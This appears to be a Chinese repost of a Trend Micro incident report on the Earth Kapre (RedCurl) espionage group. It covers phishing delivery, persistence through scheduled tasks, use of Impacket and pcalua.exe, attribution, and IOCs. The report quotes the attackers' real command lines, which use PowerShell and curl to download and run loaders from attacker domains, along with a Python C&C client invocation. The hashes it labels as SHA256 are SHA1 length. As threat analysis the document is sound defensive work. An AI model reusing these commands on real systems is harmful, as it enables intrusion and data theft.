间谍组织 Earth Kapre(又名 RedCurl 和 Red Wolf)一直在积极针对俄罗斯、德国、乌克兰、英国、斯洛文尼亚、加拿大、澳大利亚和美国的组织开展网络钓鱼活动。它使用包含恶意附件(.iso 和 .img)的网络钓鱼电子邮件,打开后就会成功感染。这会触发创建持久性计划任务,同时未经授权收集敏感数据并将其传输到命令和控制 (C&C) 服务器。
趋势科技托管扩展检测和响应 (MDR) 和事件响应 (IR) 团队对多台计算机被 Earth Kapre 下载程序感染的事件进行了调查。观察到该恶意软件与其 C&C 服务器建立连接,这表明存在潜在的数据盗窃情况。有趣的是,在这种情况下,Earth Kapre 又重新使用了一种与其最近的活动不同的先前已知技术:它使用合法工具Powershell.exe和curl.exe来获取后续阶段的下载程序。为了混入网络并逃避检测,Earth Kapre 被发现使用程序兼容性助手 ( pcalua.exe ) 来执行恶意命令行。
本博客文章将探讨趋势科技 MDR 团队的调查,该调查成功揭露了 Earth Kapre 在最近的一次事件中使用的入侵集,以及该团队如何利用威胁情报将提取的证据归因于网络间谍威胁组织。
MDR investigation
趋势科技 MDR 威胁搜寻团队最初检测到在C:WindowsSystem32ms.dll中创建了可疑文件(趋势科技检测为 Trojan.Win64.CRUDLER.A)。进一步调查发现,使用curl.exe从以下URL下载文件:
http://preston[.]melanibest[.]com/ms/ms.tmp
https://preslive[.]cn[.]alphastoned.pro/ms/msa.tmp
https://unipreg[.]tumsun[.]com/ms/psa.tmp
http://report[.]hkieca[.]com/ms/msa.tmp
图 1. Trend Vision One™ 执行配置文件显示使用“http://preston[.]melanibest[.]com”(23[.]254[.]224[.]) 中的“curl.exe”下载的 Earth Kapre 加载程序79)
在检查文件创建前后的事件后,我们发现威胁参与者执行了以下操作:
我们观察到初始命令使用 PowerShell从 URL http://preston[.]melaniebest[.]com/ms/curl.tmp下载文件 ( curl.tmp ) ,并将其保存为C : WindowsSystem32目录。为了便于分析,我们将使用此域,但相同的分析也应适用于前面提到的 URL 列表中的其他域。Curl.exe是一个命令行工具和库,旨在通过 URL 进行高效数据传输。虽然它是合法工具,但也可能被威胁行为者滥用以达到恶意目的。
%COMSPEC% /Q /c echo powershell -c "iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:WindowsSystem32curl.exe -UseBasicParsing" ^> \127.0.0.1C$dvPqyh 2^>^&1 > %TEMP%KzIMnc.bat & %COMSPEC% /Q /c %TEMP%KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%KzIMnc.bat
接下来,下载7za.tmp并将其作为7za.exe保存在C:WindowsSystem32目录中。7za.exe 是 7-Zip 的副本,7-Zip 是一种流行的开源文件压缩和归档实用程序。
C:Windowssystem32cmd.exe /Q /c echo curl -o C:WindowsSystem327za.exe http://preston[.]melaniebest[.]com/ms/7za.tmp ^> 127.0.0.1C$xWJhao 2^>^&1 > C:WindowsTEMPIAqJUm.bat & C:Windowssystem32cmd.exe /Q /c C:WindowsTEMPIAqJUm.bat & C:Windowssystem32cmd.exe /Q /c del C:WindowsTEMPIAqJUm.bat
然后使用来自同一域http://preston[.]melaniebest[.]com/ms/ms.tmp 的curl.exe下载 Earth Kapre 加载程序,并保存为ms.dll(尽管应该注意的是在某些计算机中,使用的文件名是C:WindowsSystem32目录中的ps.dll ) 。威胁行为者使用echo(也如之前的命令中所示)并将其输出到批处理文件中,这是一种常用的混淆技术。通过将命令回显到批处理文件中,他们可以动态生成和执行命令,从而使分析或检测恶意活动变得更加困难。使用临时批处理文件还可以实现任务自动化并更轻松地规避安全监控。我们观察到,威胁行为者随后删除了批处理文件以掩盖他们的踪迹。
C:Windowssystem32cmd.exe /Q /c echo curl -o C:WindowsSystem32ms.dll http://preston[.]melanibest.com/ms/ms.tmp ^> \127.0 .0.1C$tZpOKq 2^>^&1 > C:WindowsTEMPDFMPAa.bat & C:Windowssystem32cmd.exe /Q /c C:WindowsTEMPDFMPAa.bat & C :Windowssystem32cmd.exe /Q /c del C:WindowsTEMPDFMPAa.bat
由于ms.tmp是一个存档,因此威胁参与者需要使用之前下载的7za.exe ( 7zip ) 通过密码“123”提取文件内容。
C:Windowssystem32cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:WindowsTempms.tmp -o C:WindowsTemp ^> \127.0.0.1 C$lgNMiK 2^>^&1 > C:WindowsTEMPBuWmUA.bat & C:Windowssystem32cmd.exe /Q /c C:WindowsTEMPBuWmUA.bat & C:Windows system32cmd.exe /Q /c del C:WindowsTEMPBuWmUA
然后使用rundll32.exe在机器上执行ms.dll (在某些机器上,执行ps.dll )。
%COMSPEC% /Q /c echo rundll32.exe C:Windowssystem32ms.dll,ms ^> \127.0.0.1C$NoajCy 2^>^&1 > %TEMP%YdEcul.bat & % COMSPEC% /Q /c %TEMP%YdEcul.bat & %COMSPEC% /Q /c del %TEMP%YdEcul.bat
Python 脚本旨在通过端口 445 使用服务器消息块 (SMB) 建立出站通信并执行远程命令。在执行名为client.py的脚本期间,外部 IP 地址为198[.]252[.]101[ .]86,作为命令行参数传递,暗示其作为 C&C 服务器的潜在角色。
"C:Users\AppDataRoamingMUIServicepythonw.exe" C:Users\AppDataRoamingMUIServicerpvclient.py --server-ip 198[.]252[.]101[.]86 --server-port 41808
Impacket 的构建
Impacket是用于构建和操作网络协议的 Python 类的开源集合。在组织的网络中检测到 Impacket 活动,表明其使用 Windows 网络协议交互。观察到的命令行与 Impacket 的smbexec脚本一致,从而通过 SMB 启用半交互式 shell。威胁参与者被 Impacket 的多功能性所吸引,并利用其功能执行未经授权的命令,正如本博客文章中所强调的那样。
图 2. 注册表中与 Impacket 相关的服务的证据
图 3. 通过 Trend Vision One 执行配置文件在注册表中观察到的 Impacket 执行示例
我们在调查中发现的命令行与 Impacket 的smbexec脚本非常相似,如以下示例所示:
Registry root: 3
Registry key: HKLMSYSTEMCurrentControlSetServicesaQpzRMnIku
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo rundll32.exe C:Windowssystem32ms.dll,ms ^> \127.0.0.1C$NoajCy 2^>^&1 > %TEMP%YdEcul.bat & %COMSPEC% /Q /c %TEMP%YdEcul.bat & %COMSPEC% /Q /c del %TEMP%YdEcul.bat
Registry value type: 2
Registry root: 3
Registry key: HKLMSYSTEMCurrentControlSetServiceskPbzlGKCyO
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo curl -o C:WindowsSystem32ms.dll http://preston.melaniebest.com/ms/ms.tmp ^> \127.0.0.1C$tZpOKq 2^>^&1 > %TEMP%DFMPAa.bat & %COMSPEC% /Q /c %TEMP%DFMPAa.bat & %COMSPEC% /Q /c del %TEMP%DFMPAa.bat
Registry value type: 2
Registry root: 3
Registry key: HKLMSYSTEMCurrentControlSetServiceslzZqdAEwKP
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo curl -o C:WindowsSystem327za.exe http://preston.melaniebest.com/ms/7za.tmp ^> \127.0.0.1C$xWJhao 2^>^&1 > %TEMP%IAqJUm.bat & %COMSPEC% /Q /c %TEMP%IAqJUm.bat & %COMSPEC% /Q /c del %TEMP%IAqJUm.bat
Registry value type: 2
我们发现了一个似乎使用netstat检查开放端口 4119 的命令。该命令的目的可能涉及收集链接到指定端口的网络连接信息或检查netstat输出中的特定模式。端口 4119 用作趋势科技趋势科技深度安全防护系统管理器 GUI 和 API 端口,表明威胁参与者可能正在验证该计算机上是否存在安全程序。
Registry root: 3
Registry key: HKLMSYSTEMCurrentControlSetServiceszOMISPlXbL
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo netstat -an | find "4119" ^> \127.0.0.1C$SspgqD 2^>^&1 > %TEMP%MjHubF.bat & %COMSPEC% /Q /c %TEMP%MjHubF.bat & %COMSPEC% /Q /c del %TEMP%MjHubF.bat
Registry value type: 2
图 4. netstat 检查端口 4419 是否打开的证据
通过间接命令执行滥用程序兼容性助手服务
程序兼容性助手服务 ( pcalua.exe ) 是一项 Windows 服务,旨在识别和解决旧程序的兼容性问题。攻击者可以利用此实用程序来启用命令执行并通过将其用作替代命令行解释器来绕过安全限制。在本次调查中,威胁行为者使用此工具来掩盖他们的活动。
Earth Kapre 下载器已以随机生成或混淆的文件名分布在各个位置。以下是我们在调查中发现的一些例子:
C:Windowssystem32configsystemprofileAppDataLocalAppListgkcb92eb2f8982d93a.exe
C:Windowssystem32configsystemprofileAppDataLocalMicrosoftWindowsWininetgkcb92eb2f8982d93a.exe
C:Windowssystem32configsystemprofileAppDataLocalMicrosoftWindowsWininetsgef07b190e6e6d160.exe
C:Windowssystem32configsystemprofileAppDataLocalAppListsgef07b190e6e6d160.exe
C:Windowssystem32configsystemprofileAppDataLocalSubscriptionujb7238088847c09ed.exe
C:Users\AppDataLocalBrokerInfraSVRfik9562b2dec16c7ad6.exe
C:Users\AppDataLocalBrokerInfraizd9562b2dec16c7ad6.exe
C:Windowssystem32configsystemprofileAppDataLocalSysmainzyp14f2b5c5ecbb07d8.exe
C:Windowssystem32configsystemprofileAppDataLocaltw-pfdc-320c6-4e95qd.tmppj8434bb720ad953af.exe
C:Windowssystem32configsystemprofileAppDataLocaltw-pfdc-320c6-4e95qd.tmpkmjf1a1952febed5f77.exe
C:Windowssystem32configsystemprofileAppDataLocalMicrosoftWindowsDirectoryClientyff936ad712ca94fc9.exe
C:Windowssystem32configsystemprofileAppDataLocalD3DSCache85ceb3adf3f4542lva662fdf404f617d07.exe
C:Windowssystem32configsystemprofileAppDataLocalMicrosoftWindowsPRICache2630989932ogh0a430e919a35efd8.ex
C:Windowssystem32configsystemprofileAppDataLocalPlexComponentODNylob1c94b2421ca1d39.exe
C:Users\AppDataRoamingVirtualStoreChromeSY_Q05MQVAyMw==.exe
在下面的屏幕截图示例中,我们观察到由pcalua.exe生成的文件gkcb92eb2f8982d93a.exe建立了与preston[.]melaniebest[.]com的连接,该域与上一节中讨论的域相同。
图 5. Earth Kapre 下载器连接到“preston[.]melanibest[.]com”
为了确认网络连接的可用性,Earth Kapre 下载程序会向从以下列表中随机选择的网络资源发送 HTTP GET 请求:
www.amazon.com
www.bing.com
duckduckgo.com
www.ebay.com
www.google.com
www.google.co.uk
www.microsoft.com
www.msn.com
ocsp.digicert.com
ocsp.pki.goog
ocsp.usertrust.com
openid.ladatap.com
www.reddit.com
unipreg.tumsun.com
www.wikipedia.org
x1.c.lencr.org
www.yahoo.com
通过分析获取的Earth Kapre下载器示例文件,我们确认使用了InternetOpenA和InternetConnectA API函数。这些函数促进 HTTP 请求并验证网络连接是否存在。
图 6. Earth Kapre 下载程序通过向 www.yahoo.com 发送 HTTP 请求来确认网络连接。
使用计划任务进行持久化
安装了计划任务以实现持久性,如图 7 所示,其中各种任务在执行 Earth Kapre 下载程序文件之前开始。图 7 进一步揭示了在执行 Earth Kapre 下载程序之前可疑任务CacheTask ef07b190e6e6d160的执行情况。
processCmd: C:Windowssystem32svchost.exe -k netsvcs -p -s Schedule
schtasks /run /tn“MicrosoftWindowsWininetCacheTask ef07b190e6e6d160”“pcalua.exe”-a C:Windowssystem32configsystemprofileAppDataLocalMicrosoftWindowsWininetsgef07b190e6e6d160.exe
图 7. 计划任务的可疑执行
每台计算机的任务名称、文件名和文件位置都不同。图 8 显示了每小时执行C:Users\AppDataLocalSysmainoxdece5f42fddfbde1.exe 的恶意计划任务的证据。
图 8. 从“C:WindowsSystem32Tasks”收集的计划任务持久性证据
创建的任务名称因计算机而异,但它包含关联的 Earth Kapre 下载程序文件名的一部分。例如,如果文件名为ef07b190e6e6d160.exe,则计划任务将命名为CacheTask ef07b190e6e6d160。表 1 显示了在网络中受感染计算机上创建的任务名称示例。
表 1. 在受感染计算机中创建的任务名称
追踪进入点
鉴于所识别的零号病人机器没有安装趋势科技 XDR,我们在追踪攻击入口点时的可见性有限。为了解决这一差距,我们尝试通过识别事件中观察到的类似基础设施来完成链条。利用我们调查中的 IP 地址23[.]254[.]224[.]79,我们通过网络威胁情报系统地跨过各个数据点,并推断出初始访问是通过携带恶意附件的网络钓鱼电子邮件进行的。在野外发现的 Earth Kapre 样本(包括本次攻击中使用的样本)共享相同的基础设施,并且通常通过通过电子邮件接收的恶意 ISO 或 IMG 文件进行传递。
网络威胁情报方法(包括数据丰富和关联技术)的使用增强了我们查明入口点的能力,如下图所示。
图 9. 显示潜在进入点的病毒总数图
图 10. Earth Kapre 攻击链
归因分析
多个数据点和指标强烈表明 Earth Kapre 参与了这次攻击,强调了该组织正在进行的活动,我们将在本节中详细解释。
- C&C基础设施
所有观察到的 C&C 服务器都转向23[.]254[.]224[.]79,这是一个被 Earth Kapre 广泛用作 C&C 服务器的 IP 地址,基于 2023 年下半年至今发现的样本。
图 11. 通过旋转和关联“23[.]254[.]224[.]79”的数据点来丰富数据
IP 地址198[.]252[.]101[.]86作为Client.py脚本的参数提供,链接到 Earth Kapre 组织发送的一封网络钓鱼电子邮件。此网络钓鱼电子邮件包含一个附件,可导致下载恶意 LNK 文件和 Earth Kapre 下载程序。
图 12. 通过旋转和关联“198[.]252[.]101[.]86”的数据点来丰富数据
IP 地址和网络钓鱼电子邮件之间的联系可以从邮件标头确定,因为 IP 地址显示为从威胁行为者到受害者的邮件路由中的第一跳。
图 13. 198[.]252[.]101[.]86 IP 地址与网络钓鱼电子邮件之间的连接
- 代码和行为的相似之处
我们检查的样本与之前活动中使用的已知 Earth Kapre 下载器的代码相似。虽然我们处理的事件样本乍一看似乎有些不同,但仔细分析后发现功能上有惊人的相似之处。
例如,我们检查的新示例中的字符串解密函数获取 Bcrypt API 的地址并在运行时调用它们,而不是导入它们,这是旧的可用示例所做的。然而,我们检查的示例解密字符串的方式让人想起旧示例使用的解密技术:
计算硬编码字符串 ( yxNLWpc0s4JUTR8O3GOJC ) 的 SHA256。
使用部分哈希值作为高级加密标准 (AES) 解密的加密密钥。
图 14. 所检查的示例显示了旧解密技术的一部分以及 Bcrypt API 的调用。
图 15. 在运行时获取 API 地址
图 16. 加载并初始化 SHA256 算法
图 17. 加载并初始化 AES 算法
图 18. 使用 BcryptDecrypt API 解密字符串
旧版和新版 Earth Kapre 下载器样本之间的简单比较表明,样本之间有 70% 到 90% 的相似度。我们还注意到样本行为方式的相似之处,例如它们检查互联网可用性以及与 C&C 服务器通信的方式。
图 20. 检查互联网可用性
使用入侵分析的Diamond模型
入侵分析Diamond模型是一个对于入侵分析至关重要的网络安全框架。它通过关注四个关键方面来解码网络威胁:对手、基础设施、能力和受害者。了解网络攻击的对象、原因和方式有助于网络安全专业人员预测威胁并做好准备。它探讨了对手的地理起源、身份、赞助、动机和时间表。
目标:威胁行为者/攻击者
能力:对手的工具和/或技术
基础设施:对手使用的物理和/或逻辑资源
受害者:被对手攻击的组织或系统
通过一起分析这四个组成部分,入侵分析的Diamond模型可以帮助网络安全专业人员和分析师全面了解网络威胁,并有助于将威胁归因于特定的对手或团体。它提供了一种结构化方法来组织和分析可用数据,增强安全团队就网络安全策略和响应做出明智决策的能力。
图 21. Earth Kapre 策略、技术和程序 (TTP)、受害者和基础设施(通过入侵分析框架的Diamond模型)
在Diamond模型中,我们应用“二法则”指南,寻求跨各种入侵集的一致组合。如果特定组合在Diamond模型中显示出两个顶点,则我们面临同一威胁参与者的可能性更大。
在我们对此案例的分析中,在Diamond模型的能力顶点内,我们将来自野外的 Earth Kapre 样本与从客户环境中获取的 Earth Kapre 样本进行了比较。虽然新样本显示了更新的结构,但两个样本都连接到相同的基础设施。这种能力和基础设施的一致性强烈表明与地球卡普雷集团的联系。
结论
此案例凸显了 Earth Kapre 所构成的持续且活跃的威胁,该威胁行为者针对多个国家的各种行业。该攻击者采用复杂的策略,例如滥用 PowerShell、curl 和程序兼容性助手 ( pcalua.exe ) 来执行恶意命令,展示其致力于逃避目标网络内的检测。
对组织网络内 Impacket 活动的检测揭示了滥用该工具进行 Windows 网络协议交互的令人担忧的趋势。威胁行为者正在利用 Impacket 的多功能性并利用其功能来执行未经授权的命令。
本报告强调了威胁情报在弥合调查差距、填补对于全面理解和保护至关重要的缺失证据方面的重要性。对于寻求加强防御的组织来说,了解攻击背后的威胁行为者至关重要。这些知识不仅有助于识别潜在动机,还可以实施量身定制的安全措施,以帮助防止特定威胁。
正如最近的事件调查所证明的,MDR 在发现入侵集方面的作用体现了其对网络安全的关键贡献。MDR 在将从攻击中提取的证据归咎于 Earth Kapre 威胁组织方面发挥了关键作用。这强化了先进威胁检测和响应解决方案在有效应对复杂威胁行为者方面的重要作用。
组织还应考虑使用多层方法来保护系统的可能入口点(端点、电子邮件、Web 和网络)。以下趋势科技解决方案可以检测恶意组件和可疑行为,以帮助确保企业安全:
IOC
SHA256
1cf5d081dcc474eefb710ce11f67ab2a9d5f829a Trojan.Win64.CRUDLER.A
28ef33b00c9c347f35405ff0b35c499acd71573e Trojan.Win64.CRUDLER.A
2003d2de9c155799fea82663245add57d59813aa Trojan.Win64.CRUDLER.A
240e037af8964388d8ca92385528bece5e0c6546 Trojan.Win64.CRUDLER.A.enc
5f0fea19115fea2596a6db636736ff96510b79fb Trojan.Win64.CRUDLER.A
67dae474eb9eb8c2f7b8d315d84ca9b5de31d5da Trojan.Win64.CRUDLER.A.enc
732aa4679a372696b67c0666cd8c0279049d7a92 Trojan.Win64.CRUDLER.A
819c480f31650773a8e3de3ffb8f89a8ce062368 Trojan.Win64.CRUDLER.A
8a8f1dcdc301036fae02269da2d26f321886444b Trojan.Win64.CRUDLER.A
8e5bacc6773843bac2f52c63bd0f6e4a868eb4da Trojan.Win64.CRUDLER.A
ae5496ce5295a11957d7bb19c903c8128d0e73c1 Trojan.XML.CRUDLER.A
df4099baa679fca159a301fb1b9aaa9d4ef4648c Trojan.Win64.CRUDLER.A
f3cfbf02099830ce9492d231b4a00dbcb46facd4 Trojan.Win64.CRUDLER.A
C&C servers
23[.]254[.]224[.]79
198[.]252[.]101[.]86
http://preston[.]melaniebest[.]com/ms/ms.tmp = 79. Disease Vector
http://preston[.]melaniebest[.]com/ms/msa.tmp = 79. Disease Vector
http://preston[.]melaniebest[.]com/ms/curl.tmp = 79. Disease Vector
http://preston[.]melaniebest[.]com/ms/7za.tmp = 79. Disease Vector
https://preslive[.]cn[.]alphastoned[.]pro/ms/msa.tmp = 79. Disease Vector
https://preslive[.]cn[.]alphastoned[.]pro/ms/curl.tmp = 79. Disease Vector
https://preslive[.]cn[.]alphastoned[.]pro/ms/7 = 79. Disease Vector
http://unipreg[.]tumsun[.]com:80/ms/psa.tmp = 79. Disease Vector
http://unipreg[.]tumsun[.]com:80/ms/7za.tmp = 79. Disease Vector
https://preslive[.]cn[.]alphastoned[.]pro:443/ms/curl.tmp = 79. Disease Vector
参考链接: https://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html
图片来源网络目标可联系删除